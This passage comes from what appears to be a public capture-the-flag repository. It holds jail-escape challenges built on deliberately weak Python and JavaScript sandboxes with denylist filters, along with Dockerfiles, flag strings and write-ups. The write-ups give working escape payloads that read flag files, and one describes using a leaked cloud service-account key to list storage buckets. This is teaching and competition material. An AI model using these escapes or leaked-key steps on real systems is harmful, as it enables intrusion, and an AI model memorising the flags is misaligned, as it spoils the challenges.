10 | "author": "SteakEnthusiast", 11 | "license": "ISC", 12 | "dependencies": { 13 | "@babel/generator": "^7.23.6", 14 | "@babel/parser": "^7.23.6", 15 | "@babel/traverse": "^7.23.6", 16 | "readline": "^1.3.0" 17 | }, 18 | "type": "module" 19 | } 20 | -------------------------------------------------------------------------------- /Jail/baby_js_blacklist/chal/run: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /home/ctfuser/app 3 | /usr/local/bin/node /home/ctfuser/app/chal.js -------------------------------------------------------------------------------- /Jail/baby_js_blacklist/solve/flag: -------------------------------------------------------------------------------- 1 | 
uoftctf{b4by_j4v4scr1p7_gr3w_up_4nd_b3c4m3_4_h4ck3r} -------------------------------------------------------------------------------- /Jail/baby_js_blacklist/solve/writeup.md: -------------------------------------------------------------------------------- 1 | # Payload 2 | 3 | There are many ways to call a function without the use of a CallExpression. The below solution makes use of a NewExpression to create a new function that reads the flag file. Then, we use [tagged templates](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#tagged_templates) to call the function. 4 | 5 | ```js 6 | new Function('let result=process.binding("spawn_sync").spawn({file:"cat",args:["cat","./flag"],stdio:[{type:"pipe",readable:true,writable:false},{type:"pipe",readable:false,writable:true},{type:"pipe",readable:false,writable:true},],});let output=result.output[1].toString();return output;')`` 7 | ``` 8 | -------------------------------------------------------------------------------- /Jail/babys_first_pyjail/README.md: -------------------------------------------------------------------------------- 1 | # Baby's First Pyjail 2 | 3 | @windex told me that jails should be sourceless. So no source for you. -------------------------------------------------------------------------------- /Jail/babys_first_pyjail/solve/writeup.md: -------------------------------------------------------------------------------- 1 | Many solutions. 
An easy one: 2 | 3 | ```py 4 | >>> breakpoint() 5 | --Return-- 6 | > (1)()->None 7 | (Pdb) import os; os.system('cat flag') 8 | uoftctf{you_got_out_of_jail_free} 9 | 0 10 | (Pdb) 11 | ``` -------------------------------------------------------------------------------- /Jail/babys_first_pyjail/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.13-slim-bullseye AS app 2 | 3 | RUN useradd -m ctfuser 4 | 5 | RUN chown root:root /home/ctfuser 6 | RUN chmod 755 /home/ctfuser 7 | 8 | 9 | WORKDIR /home/ctfuser/app 10 | 11 | COPY --chown=root:root chal.py . 12 | 13 | RUN echo "uoftctf{you_got_out_of_jail_free}" > /home/ctfuser/app/flag && \ 14 | 15 | chmod 444 /home/ctfuser/app/flag 16 | 17 | RUN chown -R root:root /home/ctfuser && \ 18 | 19 | chmod -R 555 /home/ctfuser/app 20 | 21 | FROM pwn.red/jail 22 | 23 | COPY --from=app / /srv 24 | 25 | COPY --chmod=555 ./run /srv/app/run 26 | 27 | ENV JAIL_PIDS=40 JAIL_MEM=15M JAIL_TIME=120 -------------------------------------------------------------------------------- /Jail/babys_first_pyjail/src/chal.py: -------------------------------------------------------------------------------- 1 | blacklist = ["import", "exec", "eval", "os","open","read","system","module","write", "."] # substring denylist: a line is rejected only if it contains one of these strings 2 | 3 | while True: 4 | print(">>>", end=" ") 5 | try: 6 | cmd = input() 7 | for i in blacklist: 8 | if i in cmd: 9 | raise Exception("try harder") 10 | exec(cmd) # runs the accepted line in this module's namespace with the normal builtins; the denylist above is the only restriction 11 | except Exception as e: 12 | print(e) -------------------------------------------------------------------------------- /Jail/babys_first_pyjail/src/run: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /home/ctfuser/app 3 | /usr/local/bin/python chal.py -------------------------------------------------------------------------------- /Jail/js_blacklist/README.md: -------------------------------------------------------------------------------- 1 | # JS Blacklist 2 | 3 | "use 
really_really_really_strict"; 4 | 5 | Can you escape my jail now? -------------------------------------------------------------------------------- /Jail/js_blacklist/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20-bullseye-slim AS app 2 | RUN useradd -m ctfuser 3 | RUN chown root:root /home/ctfuser 4 | RUN chmod 755 /home/ctfuser 5 | 6 | WORKDIR /home/ctfuser/app 7 | 8 | COPY --chown=root:root package.json . 9 | COPY --chown=root:root chal.js . 10 | 11 | RUN npm install 12 | 13 | RUN echo "uoftctf{op710n5_4r3_4lw4y5_4n_0p710n!!!}" > /home/ctfuser/app/flag && \ 14 | 15 | chmod 444 /home/ctfuser/app/flag 16 | 17 | RUN chmod -R 555 /home/ctfuser/ 18 | 19 | FROM pwn.red/jail 20 | 21 | COPY --from=app / /srv 22 | 23 | COPY --chmod=555 run /srv/app/run 24 | 25 | ENV JAIL_PIDS=40 JAIL_MEM=100M JAIL_TIME=120 -------------------------------------------------------------------------------- /Jail/js_blacklist/chal/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "js_jail", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "chal.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [], 10 | "author": "SteakEnthusiast", 11 | "license": "ISC", 12 | "dependencies": { 13 | "@babel/generator": "^7.23.6", 14 | "@babel/parser": "^7.23.6", 15 | "@babel/traverse": "^7.23.6", 16 | "readline": "^1.3.0" 17 | }, 18 | "type": "module" 19 | } 20 | -------------------------------------------------------------------------------- /Jail/js_blacklist/chal/run: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /home/ctfuser/app 3 | /usr/local/bin/node /home/ctfuser/app/chal.js -------------------------------------------------------------------------------- /Jail/js_blacklist/solve/flag: 
-------------------------------------------------------------------------------- 1 | uoftctf{op710n5_4r3_4lw4y5_4n_0p710n!!!} -------------------------------------------------------------------------------- /Jail/js_evaluator/README.md: -------------------------------------------------------------------------------- 1 | # JS Evaluator 2 | 3 | Last year, I found a [critical security vulnerability in Babel](https://github.com/babel/babel/security/advisories/GHSA-67hx-6x53-jw92). I heard `path.evaluate()` is secure now, but it still wasn't useful enough for me. I added some code to enhance the functionality, without impacting the security! -------------------------------------------------------------------------------- /Jail/js_evaluator/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20-bullseye-slim AS app 2 | RUN useradd -m ctfuser 3 | RUN chown root:root /home/ctfuser 4 | RUN chmod 755 /home/ctfuser 5 | 6 | WORKDIR /home/ctfuser/app 7 | 8 | COPY --chown=root:root package.json . 9 | COPY --chown=root:root chal.js . 10 | COPY --chown=root:root evaluation_patched.js . 
11 | 12 | RUN npm install 13 | 14 | RUN cp /home/ctfuser/app/evaluation_patched.js /home/ctfuser/app/node_modules/@babel/traverse/lib/path/evaluation.js 15 | 16 | RUN echo "uoftctf{c411b4ck_h311_0r_c411b4ck_h34v3n??}" > /home/ctfuser/app/flag && \ 17 | 18 | chmod 444 /home/ctfuser/app/flag 19 | 20 | RUN chmod -R 555 /home/ctfuser/ 21 | 22 | FROM pwn.red/jail 23 | 24 | COPY --from=app / /srv 25 | 26 | COPY --chmod=555 run /srv/app/run 27 | 28 | ENV JAIL_PIDS=40 JAIL_MEM=100M JAIL_TIME=120 -------------------------------------------------------------------------------- /Jail/js_evaluator/chal/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "js_jail", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "chal.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [], 10 | "author": "SteakEnthusiast", 11 | "license": "ISC", 12 | "dependencies": { 13 | "@babel/generator": "^7.23.6", 14 | "@babel/parser": "^7.23.6", 15 | "@babel/traverse": "^7.23.6", 16 | "readline": "^1.3.0" 17 | }, 18 | "type": "module" 19 | } 20 | -------------------------------------------------------------------------------- /Jail/js_evaluator/chal/run: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /home/ctfuser/app 3 | /usr/local/bin/node /home/ctfuser/app/chal.js -------------------------------------------------------------------------------- /Jail/js_evaluator/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{c411b4ck_h311_0r_c411b4ck_h34v3n??} -------------------------------------------------------------------------------- /Jail/zero/README.md: -------------------------------------------------------------------------------- 1 | # Zero 2 | 3 | Zero letters, zero numbers, zero underscores, zero builtins, and zero hope of escaping. 
-------------------------------------------------------------------------------- /Jail/zero/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.13-slim-bullseye AS app 2 | 3 | RUN useradd -m ctfuser 4 | 5 | RUN chown root:root /home/ctfuser 6 | RUN chmod 755 /home/ctfuser 7 | 8 | 9 | WORKDIR /home/ctfuser/app 10 | 11 | COPY --chown=root:root chal.py . 12 | 13 | RUN echo "uoftctf{zero_security_too_apparently_lmao}" > /home/ctfuser/app/flag && \ 14 | 15 | chmod 444 /home/ctfuser/app/flag 16 | 17 | RUN chown -R root:root /home/ctfuser && \ 18 | 19 | chmod -R 555 /home/ctfuser/app 20 | 21 | FROM pwn.red/jail 22 | 23 | COPY --from=app / /srv 24 | 25 | COPY --chmod=555 ./run /srv/app/run 26 | 27 | ENV JAIL_PIDS=40 JAIL_MEM=15M JAIL_TIME=120 -------------------------------------------------------------------------------- /Jail/zero/chal/chal.py: -------------------------------------------------------------------------------- 1 | def check(code): 2 | # no ASCII letters: only these 52 characters are tested. NOTE(review): Python NFKC-normalizes identifiers, so a filter like this would need to normalize the input before testing it 3 | alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" 4 | # no ASCII digits 5 | numbers = "0123456789" 6 | # no double underscore: only the two-character sequence "__" is rejected, a single "_" passes 7 | underscore = "__" 8 | 9 | return not any((c in alphabet) or (c in numbers) or (underscore in code) for c in code) 10 | 11 | def safe_eval(code): 12 | if (check(code)): 13 | g = {'__builtins__': None} 14 | l = {'__builtins__': None} 15 | return print(eval(code, g, l )) # good luck! NOTE(review): eval of user input; the character filter and the emptied __builtins__ are the only restrictions applied here 
16 | else: 17 | print("lol no") 18 | 19 | code = input(">>> ") 20 | safe_eval(code) -------------------------------------------------------------------------------- /Jail/zero/chal/run: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /home/ctfuser/app 3 | /usr/local/bin/python chal.py -------------------------------------------------------------------------------- /Jail/zero/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{zero_security_too_apparently_lmao} -------------------------------------------------------------------------------- /Jail/zero/solve/writeup.md: -------------------------------------------------------------------------------- 1 | ().__𝘤𝘭𝘢𝘴𝘴__.__𝘣𝘢𝘴𝘦𝘴__[(''=='')-(''=='')].__𝘴𝘶𝘣𝘤𝘭𝘢𝘴𝘴𝘦𝘴__()[((''=='')+(''=='')+(''=='')+(''=='')+(''==''))**((''=='')+(''=='')+(''==''))-((''=='')+(''=='')+(''=='')+(''=='')+(''=='')+(''=='')+(''==''))].𝘨𝘦𝘵_𝘥𝘢𝘵𝘢(".",().__𝘥𝘰𝘤__[((''=='')+(''==''))**((''=='')+(''=='')+(''=='')+(''=='')+(''==''))-(''=='')] + ().__𝘥𝘰𝘤__[(''=='')+(''=='')+(''=='')] + [].__𝘥𝘰𝘤__[((''=='')+(''=='')+(''=='')+(''==''))*((''=='')+(''=='')+(''==''))] + [].__𝘥𝘰𝘤__[(((''=='')+(''=='')+(''=='')+(''==''))<<((''=='')+(''=='')+(''=='')))+((''=='')+(''=='')+(''=='')+(''==''))]) -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/solve/solve.md: -------------------------------------------------------------------------------- 1 | In Out of the Bucket we identified a JSON file (funny.json) that is a service account key. We can authenticate as that service account using the following command: 2 | ``` 3 | gcloud auth activate-service-account --key-file=funny.json 4 | ``` 5 | Then we can list the buckets (as hinted in the title): 6 | ``` 7 | gsutil ls 8 | ``` 9 | We find another bucket named flag-images. 
We can list the contents of the bucket: 10 | ``` 11 | gsutil ls gs://flag-images 12 | ``` 13 | The rest of the challenge involves hunting down the image that contains the flag. The flag is in xa.png. 14 | -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ad.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ae.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ae.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/af.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/af.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ag.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ai.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ai.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/al.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/al.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/am.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/am.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ao.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ao.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/aq.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/aq.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ar.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ar.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/as.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/as.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/at.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/at.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/au.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/au.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/aw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/aw.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ax.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ax.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/az.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/az.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ba.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ba.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bb.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bd.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/be.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/be.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bf.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bg.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bh.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bi.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bj.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bj.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bl.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bm.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bn.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bo.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bq.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bq.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/br.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/br.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bs.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bt.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bv.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bw.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bw.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/by.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/by.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bz.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ca.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ca.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cc.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cd.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cd.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cf.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cg.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ch.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ci.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ci.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ck.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ck.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cl.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cm.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cn.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/co.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/co.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cr.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cr.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cu.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cv.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cw.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cx.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cy.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cy.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cz.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/de.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/de.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/dj.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/dj.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/dk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 